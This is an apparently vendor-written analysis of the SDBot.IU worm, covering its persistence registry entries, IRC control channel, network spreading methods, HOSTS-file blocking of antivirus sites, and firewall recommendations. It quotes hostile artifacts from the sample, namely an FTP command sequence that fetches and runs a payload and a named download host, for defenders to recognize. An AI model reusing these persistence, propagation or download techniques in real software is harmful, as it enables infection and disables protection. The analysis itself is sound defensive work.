W32/SDBot.IU!worm
Analysis
Specifics
This virus is 32-bit with a packed file size of 68,611
bytes. This virus contains instructions to copy itself
to other systems across a network LAN/WAN, and also
respond to instructions received from a malicious user
after first connecting to an IRC server and channel.
When the virus copies itself to systems, the file is
saved into the System32 folder as "cool.exe".
The file is executed remotely, which then copies itself
as "syslog32.exe" in the same folder.
This virus may terminate security applications which match a hard-coded list. This virus may also function as a small FTP server.
Loading At Windows Startup
If virus is run, it will copy itself to the local system
into the drivers folder as "ntsyst32.exe"
and set a registry entry to load the virus as a service
at each Windows startup -
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
"Microsoft System Checkup" = wnetlogin.exe
"NT Logging Serivce" = syslog32.exe
IRC Connection
The virus attempts to make an IRC server connection
with a common IRC server named "irc.undernet.org".
The connection uses a destination TCP port 6667. The
connection is used mainly for communication messages
however the open port can be used by a malicious user
to send instructions to the virus.
Network Shares Infection Method
The virus may attempt to seek other machines on a network
and attempt to penetrate them by using a dictionary
attack method to log on to the target system, an RPC
DCOM exploit or an LSASS exploit.
If a system is vulnerable, the virus attempts to copy itself to the target into these shares and hard-coded locales -
C:\Documents
and Settings\All Users\Start Menu\Programs\Startup
C:\WINDOWS\Start Menu\Programs\Startup
C:\WINNT\Profiles\All Users\Start Menu\Programs\Startup
C$\WINNT\Profiles\All Users\Start Menu\Programs\Startup
C$\WINDOWS\Start Menu\Programs\Startup
C$\Documents and Settings\All Users\Start Menu\Programs\Startup
C$
File Retrieval
This virus may attempt to download files from hard-coded
websites. For instance, instructions in the virus attempt
to make a connection to 'maniacu2.homeftp.net' and retrieve
the file "cool2.exe" then execute it. At the
time of this writing, the file and server were not accessible.
When the virus begins targeting other systems, it may attempt to retrieve the downloaded file as "cool" using the following FTP instruction set -
open undefinedinfected
hostundefined 10051
h
h
get cool.exe
cool.exe
HOSTS File Overwrite
The virus attempts to block the system and user from
accessing certain Antivirus websites by overwriting
the HOSTS file with invalid resolution details, as in
this example -
127.0.0.1 www.trendmicro.com
127.0.0.1 trendmicro.com
127.0.0.1 rads.mcafee.com
127.0.0.1 customer.symantec.com
127.0.0.1 liveupdate.symantec.com
127.0.0.1 us.mcafee.com
127.0.0.1 updates.symantec.com
127.0.0.1 update.symantec.com
127.0.0.1 www.nai.com
127.0.0.1 nai.com
127.0.0.1 secure.nai.com
127.0.0.1 dispatch.mcafee.com
127.0.0.1 download.mcafee.com
127.0.0.1 www.my-etrust.com
127.0.0.1 my-etrust.com
127.0.0.1 mast.mcafee.com
127.0.0.1 ca.com
127.0.0.1 www.ca.com
127.0.0.1 networkassociates.com
127.0.0.1 www.networkassociates.com
127.0.0.1 avp.com
127.0.0.1 www.kaspersky.com
127.0.0.1 www.avp.com
127.0.0.1 kaspersky.com
127.0.0.1 www.f-secure.com
127.0.0.1 f-secure.com
127.0.0.1 viruslist.com
127.0.0.1 www.viruslist.com
127.0.0.1 liveupdate.symantecliveupdate.com
127.0.0.1 mcafee.com
127.0.0.1 www.mcafee.com
127.0.0.1 sophos.com
127.0.0.1 www.sophos.com
127.0.0.1 symantec.com
127.0.0.1 securityresponse.symantec.com
127.0.0.1 www.symantec.com
The purpose of doing this is to prevent the infected host from updating its Antivirus software.
Miscellaneous
The virus contains these strings in its unpacked form
-
---begin--- AV Guy READ: where do u come up with names like Donk.B? Put a reprezentative name like windr0ne ----end----
Windrone 8.1 final by Romanian 1337 hackers
Recommended Action
- Check the main screen using the web interface for
your FortiGate unit to ensure that the latest AV/NIDS
database has been downloaded and installed on your
system - if required, enable the "Allow Push
Update" option
- Using the FortiGate manager, block internal to external and external to internal access using TCP ports 6667 and 10051 - it may require defining ports as a service prior to blocking
Telemetry
Detection Availability
FortiGate | |
---|---|
Extreme | |
FortiClient | |
Extended | |
FortiMail | |
Extended | |
FortiSandbox | |
Extended | |
FortiWeb | |
Extended | |
Web Application Firewall | |
Extended | |
FortiIsolator | |
Extended | |
FortiDeceptor | |
Extended | |
FortiEDR |